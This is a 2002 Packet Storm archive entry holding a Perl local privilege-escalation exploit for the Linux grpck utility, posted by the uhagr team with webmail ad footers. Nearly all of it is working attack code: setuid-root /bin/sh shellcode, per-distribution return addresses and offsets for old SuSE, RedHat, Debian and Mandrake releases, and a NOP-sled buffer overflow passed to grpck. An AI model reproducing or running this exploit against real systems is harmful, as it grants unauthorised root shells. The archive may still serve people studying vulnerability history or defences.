grpck-expl.pl

2002-11-19T00:00:00
ID PACKETSTORM:30493
Type packetstorm
Reporter Black Rose
Modified 2002-11-19T00:00:00

Description

                                        
                                            `Hi packetstorm dudez!  
  
--- start here ---  
#!/usr/bin/perl  
  
# www.uhagr.org - ghostian@linuxmail.gr   
  
# This is only a Proof of concept.   
# /usr/sbin/grpck is not suid root by default.  
  
# castle:~ # /usr/sbin/grpck `perl -e 'print "X"x2900'`  
# Segmentation fault  
# castle:~ #  
  
my $usage = <<x;  
  
[ uhagr team -ghostian -extraneous ]   
-- grpck Local r00t exploit --   
  
Usage: ./grpck-expl.pl <target>  
Example: ./grpck-expl.pl 1  
  
TARGETS:  
[ 1 ] SuSE Linux 7.2  
[ 2 ] RedHat Linux 8.0   
[ 3 ] RedHat Linux 7.3  
[ 4 ] RedHat Linux 7.2  
[ 5 ] Debian Linux 2.2  
[ 6 ] Mandrake Linux 8.2  
x  
  
$target = ($ARGV[0]);  
  
$shellcode =   
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .  
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .  
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .  
"\x80\xe8\xdc\xff\xff\xff/bin/sh";  
  
if (!$target) { print "$usage\n"; exit; }  
  
if ($target eq '1') {  
$ret = 0xbfffe514;  
$offset = 940;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: SuSE Linux 7.2\n";  
}  
  
if ($target eq '2' ) {  
$ret = 0xbfffe5bc;  
$offset = 851;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: RedHat Linux 8.0\n";  
}  
  
if ($target eq '3' ) {  
$ret = 0xbfffef94;  
$offset = 1812;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: RedHat Linux 7.3\n";  
}  
  
if ($target eq '4' ) {  
$ret = 0xbfffe73c;  
$offset = 645;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: RedHat Linux 7.2\n";  
}  
  
if ($target eq '5' ) {  
$ret = 0xbfffe934;  
$offset = 1541;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: Debian Linux 3.0r0\n";  
}  
  
if ($target eq '6' ) {  
$ret = 0xbffff0ae;  
$offset = 1859;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: Mandrake Linux 8.2\n";  
}  
  
  
$addr = pack('l', ($ret + $offset));  
for ($i = 0; $i < $buf; $i += 4) {  
$buffer .= $addr;  
}  
  
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) {  
$buffer .= $nop;  
}  
  
$buffer .= $shellcode;  
print "r00t?\n";   
exec("/usr/sbin/grpck", $buffer,0);  
  
# Have a nice night ;]  
--- cut here ---  
  
Thanks!  
The uhagr team  
  
_____________________________________________________________  
Sign up for FREE email from LinuxMail.gr at http://www.linuxmail.gr  
Powered by LinuxFreaks.gr  
  
_____________________________________________________________  
Select your own custom email address for FREE! Get you@yourchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag  
`